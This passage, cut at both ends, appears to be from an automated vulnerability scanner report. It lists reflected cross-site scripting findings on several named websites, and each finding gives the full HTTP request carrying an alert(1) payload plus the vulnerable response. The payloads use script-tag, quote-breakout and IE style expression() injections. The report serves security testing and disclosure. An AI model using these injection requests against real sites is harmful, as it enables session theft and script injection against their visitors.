...[SNIP]...

3.9. http://nanpa.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd47a<script>alert(1)</script>0e5c60d2086 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocd47a<script>alert(1)</script>0e5c60d2086 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:35 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/favicon.icocd47a<script>alert(1)</script>0e5c60d2086</span>
...[SNIP]...

3.10. http://nanpa.org/history.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /history.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd331<script>alert(1)</script>6930481ebe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /history.phpfd331<script>alert(1)</script>6930481ebe4 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/about_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/history.phpfd331<script>alert(1)</script>6930481ebe4</span>
...[SNIP]...

3.11. http://nanpa.org/recent_forum_posts.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /recent_forum_posts.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9a60<script>alert(1)</script>dec3bb51a6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /recent_forum_posts.phpd9a60<script>alert(1)</script>dec3bb51a6f HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:03:56 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/recent_forum_posts.phpd9a60<script>alert(1)</script>dec3bb51a6f</span>
...[SNIP]...

3.12. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.industryclick.com
Path:   /feedmix/connected_planet_all_with_teaser/heds.js

Issue detail

The value of the count request parameter is copied into the HTML document as plain text between tags. The payload b47cc<script>alert(1)</script>8e664057342 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_all_with_teaser/heds.js?count=5b47cc<script>alert(1)</script>8e664057342&pool=5 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:44 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 10
Content-Length: 189
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_all_with_teaser</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 5b47cc<script>alert(1)</script>8e664057342

</body>
</html>


3.13. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [pool parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.industryclick.com
Path:   /feedmix/connected_planet_all_with_teaser/heds.js

Issue detail

The value of the pool request parameter is copied into the HTML document as plain text between tags. The payload d94a5<script>alert(1)</script>24642529fa1 was submitted in the pool parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_all_with_teaser/heds.js?count=5&pool=5d94a5<script>alert(1)</script>24642529fa1 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:47 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 15
Content-Length: 189
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_all_with_teaser</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 5d94a5<script>alert(1)</script>24642529fa1

</body>
</html>


3.14. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.industryclick.com
Path:   /feedmix/connected_planet_bss_oss/heds.js

Issue detail

The value of the count request parameter is copied into the HTML document as plain text between tags. The payload 256ed<script>alert(1)</script>e87fa36bb99 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_bss_oss/heds.js?count=2256ed<script>alert(1)</script>e87fa36bb99&pool=2 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:15 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 10
Content-Length: 181
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_bss_oss</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 2256ed<script>alert(1)</script>e87fa36bb99

</body>
</html>


3.15. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [pool parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.industryclick.com
Path:   /feedmix/connected_planet_bss_oss/heds.js

Issue detail

The value of the pool request parameter is copied into the HTML document as plain text between tags. The payload cd33e<script>alert(1)</script>c1014f2447a was submitted in the pool parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_bss_oss/heds.js?count=2&pool=2cd33e<script>alert(1)</script>c1014f2447a HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:18 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 15
Content-Length: 181
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_bss_oss</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 2cd33e<script>alert(1)</script>c1014f2447a

</body>
</html>


3.16. http://www.911enable.com/business/contact_specialist.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.911enable.com
Path:   /business/contact_specialist.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02b2"style%3d"x%3aexpression(alert(1))"23c70c3c464 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f02b2"style="x:expression(alert(1))"23c70c3c464 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/contact_specialist.php?provenance=e/f02b2"style%3d"x%3aexpression(alert(1))"23c70c3c464mpty HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=p5lqitlmc9snsm73suv3mulrv4; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:31 GMT
Content-Length: 23821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<form name="informationRequest_frm" action="./contact_specialist.php?provenance=e/f02b2"style="x:expression(alert(1))"23c70c3c464mpty" method="POST">
...[SNIP]...

3.17. http://www.911enable.com/business/contact_specialist.php [provenance parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.911enable.com
Path:   /business/contact_specialist.php

Issue detail

The value of the provenance request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907f1"style%3d"x%3aexpression(alert(1))"092838a3115 was submitted in the provenance parameter. This input was echoed as 907f1"style="x:expression(alert(1))"092838a3115 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/contact_specialist.php?provenance=empty907f1"style%3d"x%3aexpression(alert(1))"092838a3115 HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=tc1hn7igi104t6cg6nldeki6u4; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:18 GMT
Content-Length: 23818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<form name="informationRequest_frm" action="./contact_specialist.php?provenance=empty907f1"style="x:expression(alert(1))"092838a3115" method="POST">
...[SNIP]...

3.18. http://www.commpartnersconnect.com/company [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.commpartnersconnect.com
Path:   /company

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81d1e<script>alert(1)</script>801ba3b362c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /company81d1e<script>alert(1)</script>801ba3b362c?number=&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:51:57 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=a5e17a7f9d60bb5543670f51e71d4278; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 360
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /company81d1e<script>alert(1)</script>801ba3b362c was not found on this server.<P>
...[SNIP]...

3.19. http://www.commpartnersconnect.com/company [number parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.commpartnersconnect.com
Path:   /company

Issue detail

The value of the number request parameter is copied into the HTML document as plain text between tags. The payload bffcd<script>alert(1)</script>94923c6e023 was submitted in the number parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /company?number=bffcd<script>alert(1)</script>94923c6e023&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:50:40 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=545eb0d341bd56039888049293fbe63b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 173
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305161150243({"body": "<p class=bodycopy01>Phone Number: <b>bffcd<script>alert(1)</script>94923c6e023</b><br>Is not currently in our coverage area.<br><p>&nbsp;</p>"})

3.20. http://www.commpartnersconnect.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.commpartnersconnect.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0927<script>alert(1)</script>e987f03bb37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob0927<script>alert(1)</script>e987f03bb37 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a5e17a7f9d60bb5543670f51e71d4278

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:52:57 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.icob0927<script>alert(1)</script>e987f03bb37 was not found on this server.<P>
...[SNIP]...

3.21. http://www.etalkup.com/formjsforoneutf8.aspx [workgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.etalkup.com
Path:   /formjsforoneutf8.aspx

Issue detail

The value of the workgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe6a"%3balert(1)//cddffea3e9e was submitted in the workgroup parameter. This input was echoed as 3fe6a";alert(1)//cddffea3e9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com3fe6a"%3balert(1)//cddffea3e9e HTTP/1.1
Host: www.etalkup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:06:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ptrascvqezc34x45yzfao13h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 510


var kilo_boat_logo="";
var imgChange="";
var gaJsProtocol = (("https:" == document.location.protocol) ? "https://" :"http://");
if(typeof(panelSDK)=="undefined")
{
document.write(
...[SNIP]...
<script type='text/javascript' charset='utf-8' src='"+gaJsProtocol+"www.etalkup.com/getpanelsdk.aspx?workgroup=redsky_wg@workgroup.etalkup.com3fe6a";alert(1)//cddffea3e9e'>
...[SNIP]...

3.22. http://www.etalkup.com/getpanelsdk.aspx [workgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.etalkup.com
Path:   /getpanelsdk.aspx

Issue detail

The value of the workgroup request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcb45'%3balert(1)//97c18dc0ee9 was submitted in the workgroup parameter. This input was echoed as bcb45';alert(1)//97c18dc0ee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getpanelsdk.aspx?workgroup=redsky_wg@workgroup.etalkup.combcb45'%3balert(1)//97c18dc0ee9 HTTP/1.1
Host: www.etalkup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/
Cookie: ASP.NET_SessionId=pa4hprvrpnb4lnibphzigs45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:07:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7963


var gaJsProtocol = (("https:" == document.location.protocol) ? "https://" :"http://");
var kiloboaturl=gaJsProtocol+"www.etalkup.com/images/";
var kilo_boat_globalUrl=gaJsProtocol+"www.etalk
...[SNIP]...
89";
var directWebchatUrl="http://www.etalkup.com:8087";
var kilo_boat_website=gaJsProtocol+"www.etalkup.com";
var kilo_boat_listpersons="";
var kilo_boat_workgroup='redsky_wg@workgroup.etalkup.combcb45';alert(1)//97c18dc0ee9';
var kilo_boat_domain='etalkup.com';
var company="";
var kilo_boat_agentlist="";
var kilo_boat_automation=1==1?"true":"false";
var kilo_boat_InvitationMsg = ""
var kilo_boat_ComfirmJs="";
var
...[SNIP]...

3.23. http://www.nanpa.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b03c8<script>alert(1)</script>1df8e9a6163 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob03c8<script>alert(1)</script>1df8e9a6163 HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:14:12 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/favicon.icob03c8<script>alert(1)</script>1df8e9a6163</span>
...[SNIP]...

3.24. http://www.nanpa.org/forums/external.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /forums/external.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3871<script>alert(1)</script>d19da0837d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forumsa3871<script>alert(1)</script>d19da0837d8/external.php?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/forumsa3871<script>alert(1)</script>d19da0837d8/external.php</span>
...[SNIP]...

3.25. http://www.nanpa.org/forums/external.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /forums/external.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2cef<script>alert(1)</script>253b7e5f1c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/external.phpe2cef<script>alert(1)</script>253b7e5f1c8?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
